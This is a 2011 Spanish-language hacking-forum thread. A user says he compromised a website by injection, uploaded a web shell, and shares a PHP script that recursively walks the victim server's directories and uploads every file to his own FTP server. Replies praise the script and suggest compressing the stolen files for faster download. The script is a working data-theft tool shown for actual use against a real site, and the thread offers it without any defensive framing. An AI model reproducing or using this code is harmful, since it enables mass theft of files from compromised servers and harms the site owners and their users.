send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Subir Directorios Completos por FTP

  • 7 Respuestas
  • 1575 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado s00rk

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Junio 02, 2011, 05:16:52 am »
Bueno ahorita son las 2:11 am hehe y pues entrado a una web que logre inyectar me fue muy bien y todo pero a la final pues como cualquier otro deceaba bajarme sus archivos pero como son bastantes no me los iva a bajar 1 por 1 con la shell , entonces decidi hacer un pequeño script que suba las carpetas complestas mediante FTP de mi propia PC y pues asi fue y nada mas eso seria todo paks! xD

So aqui mi codigo:

Código: PHP
  1. <?php
  2. function getDirectory( $path = '.', $level = 0, $c ){
  3.  
  4.     $ignore = You are not allowed to view links. Register or Login( 'cgi-bin', '.', '..' );
  5.  
  6.     $dh = @You are not allowed to view links. Register or Login( $path );
  7.    
  8.     while( false !== ( $file = You are not allowed to view links. Register or Login( $dh ) ) ){
  9.    
  10.         if( !You are not allowed to view links. Register or Login( $file, $ignore ) ){
  11.            
  12.             $spaces = You are not allowed to view links. Register or Login( '&nbsp;', ( $level * 4 ) );
  13.            
  14.             if( You are not allowed to view links. Register or Login( "$path/$file" ) ){
  15.            
  16.                 echo "<strong>$spaces $path/$file</strong><br />";
  17.                 Ftp($c,$path."/".$file,1);
  18.                 getDirectory( "$path/$file", ($level+1),$c );
  19.            
  20.             } else {
  21.            
  22.                 echo "$spaces $path/$file<br />";
  23.                 Ftp($c,$path."/".$file,0);
  24.            
  25.             }
  26.        
  27.         }
  28.    
  29.     }
  30.    
  31.     You are not allowed to view links. Register or Login( $dh );
  32.  
  33. }
  34.  
  35. function Ftp($c,$l, $t)
  36. {
  37.     if($t == 1)
  38.     {
  39.         You are not allowed to view links. Register or Login($c,$l);
  40.     }else{
  41.         You are not allowed to view links. Register or Login($c,$l,$l,FTP_BINARY);
  42.     }
  43. }
  44.  
  45.  $hostname = "**************";
  46.  $ftp_user_name= "***";
  47.  $ftp_user_pass = "***";
  48.  $conn_id = You are not allowed to view links. Register or Login ( $hostname );
  49.  
  50.  $login_result = You are not allowed to view links. Register or Login ( $conn_id , $ftp_user_name , $ftp_user_pass );
  51. if($conn_id && $login_result)
  52. {
  53.     You are not allowed to view links. Register or Login('max_execution_time',38000);      
  54.     getDirectory(".",0,$conn_id);
  55.     You are not allowed to view links. Register or Login($conn_id);
  56. }else{
  57.     echo "Error de conexion";
  58. }
  59.  
  60.  
  61.  
  62. ?>
Sugerencias y cualquier cosa ahi me dicen n_n
« Última modificación: Junio 02, 2011, 10:48:58 am por s00rk »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5267
  • Actividad:
    46.67%
  • Reputación 26
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Junio 02, 2011, 09:44:30 am »
Que buen codigo s00rk!!
Muchisimas gracias por compartirlo!!


Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #2 en: Junio 02, 2011, 10:58:34 am »
Buen código aunque el problema en realidad no es subir, el problema es bajarse directorios completos ya que algunas shells (como la mía) no tienen esa opción, a ver si haces uno para descargar directorios completos, de igual forma buen código.

P.D. Una sugerencia es que no subas directorios por FTP, piensa que no en todas las vulnerabilidades se obtiene un acceso FTP por lo tanto puedes utilizar el método común de formulario con algún bucle; saludos.
« Última modificación: Junio 02, 2011, 11:01:26 am por Xt3mP »
Cada vez que me das Karma me motivas

Desconectado s00rk

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Junio 02, 2011, 12:18:00 pm »
No, osea no me explique bien lo que paso esque subi tu shell y pues vi que no me podia bajar todos los archivos de una ni con el otro que me mencionaste ya que son bastantes archivos entonces lo que decidi fue crear mi servidor FTP local y usando ese codigo lo subi a la web con la shell y ya , ahorita se estan pasando los archivos a mi Servidor FTP hehe.

P.D. O no me explique bien , o no entendi muy bien tu comentario jiji :$

Desconectado ~ Yoya ~

  • *
  • Underc0der
  • Mensajes: 149
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Junio 02, 2011, 01:26:30 pm »
Si entiendo, puedes hacer una función que descargue todo los archivos de un directorio y un sub directorio.

Solo tendrias que obtener el path de todos los archivos, puedes usar la funcion You are not allowed to view links. Register or Login.

Creo que lo mejor seria comprimir todos los archivos y sub directorios de un directorio especifico. Seria como un script que realice un Backup.

Saludos.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #5 en: Junio 02, 2011, 02:02:36 pm »
Exáctamente como dice YoYa, puedes comprimir todo un directorio o archivo en un .gz o dependiendo y posteriormente forzar la descarga, de esta manera te ahorrarías mucho tiempo.

Y si, ya entendí lo que quisiste decir, es que no te supiste explicar, lo que entendí fue que subiste este script a la página vulnerable y posteriormente forzaste a subir los archivos al FTP, pero me iría más por comprimir todo y luego descargarlo ya comprimido.
Cada vez que me das Karma me motivas

Desconectado s00rk

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Junio 02, 2011, 07:28:38 pm »
Si de hecho hehe de esta forma si son muchos archivos al final cae por exeso de tiempo o bueno a mi me manda error aunque haya puesto que no tuviera limite ahora hice algo diferente hehe con el mismo metodo, pero checare lo del zip :P

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #7 en: Junio 02, 2011, 11:32:39 pm »
No pasa nada, tambien comprimir muchos archivos puede tirar error (de preferencia envía 1024 en 1024) ya que la mayoría de los hostings trae por defecto 2 MB, pero fue buena tu idea de forzar a subir todo por FTP, saludos.
Cada vez que me das Karma me motivas

 

¿Te gustó el post? COMPARTILO!



FileClass (subir y descargar archivos)

Iniciado por alexander1712

Respuestas: 3
Vistas: 1442
Último mensaje Noviembre 04, 2013, 02:16:30 pm
por alexander1712
Comprimir directorios completos de tu sitio web

Iniciado por arthusu

Respuestas: 1
Vistas: 2637
Último mensaje Marzo 23, 2015, 09:10:59 am
por DeBobiPro